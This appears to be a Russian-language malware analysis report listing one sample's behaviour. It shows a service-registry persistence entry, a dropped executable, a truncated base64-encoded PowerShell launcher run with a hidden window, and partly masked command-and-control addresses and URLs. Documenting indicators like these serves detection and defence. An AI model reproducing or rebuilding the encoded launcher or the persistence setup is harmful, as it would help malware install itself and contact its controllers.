Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\puiobj] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\puiobj] 'ImagePath' = '"%WINDIR%\SysWOW64\WPDShServiceObj\puiobj.exe"'
- 'puiobj' "%WINDIR%\SysWOW64\WPDShServiceObj\puiobj.exe"
- 'puiobj' %WINDIR%\SysWOW64\WPDShServiceObj\puiobj.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAHYAdQBfAHMAcAAyAD0AKAAnAEEAOQBpAGMAMQBuACcAKwAnADgAJwApADsAJgAoACcAbgBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQARQBOAFYAOgB0AEUAbQBQAFwATwBmAGYASQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlAC...
- %TEMP%\office2019\svwgqk.exe
- %WINDIR%\syswow64\wpdshserviceobj\puiobj.exe
- %TEMP%\office2019\svwgqk.exe в %WINDIR%\syswow64\wpdshserviceobj\puiobj.exe
- '18#.#0.61.163':443
- http://ex##.##nalearning.com/pana/e/
- http://18#.##.61.163:443/BoCa9/c6tvQyKYWzAPJEBbXA/wwSrbi/LV57EzJjwUJGj8F5w/3A0fvgYAQyzhw/3S0kqo3WOlZC/ via 18#.#0.61.163
- DNS ASK ex##.##nalearning.com
- '%TEMP%\office2019\svwgqk.exe'
- '%WINDIR%\syswow64\wpdshserviceobj\puiobj.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAHYAdQBfAHMAcAAyAD0AKAAnAEEAOQBpAGMAMQBuACcAKwAnADgAJwApADsAJgAoACcAbgBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQARQBOAFYAOgB0AEUAbQBQAFwATwBmAGYASQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlAC...' (со скрытым окном)